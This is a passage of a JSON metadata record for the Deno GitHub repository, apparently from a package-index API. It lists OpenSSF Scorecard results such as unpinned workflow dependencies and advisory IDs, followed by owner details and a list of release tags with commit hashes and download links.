https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/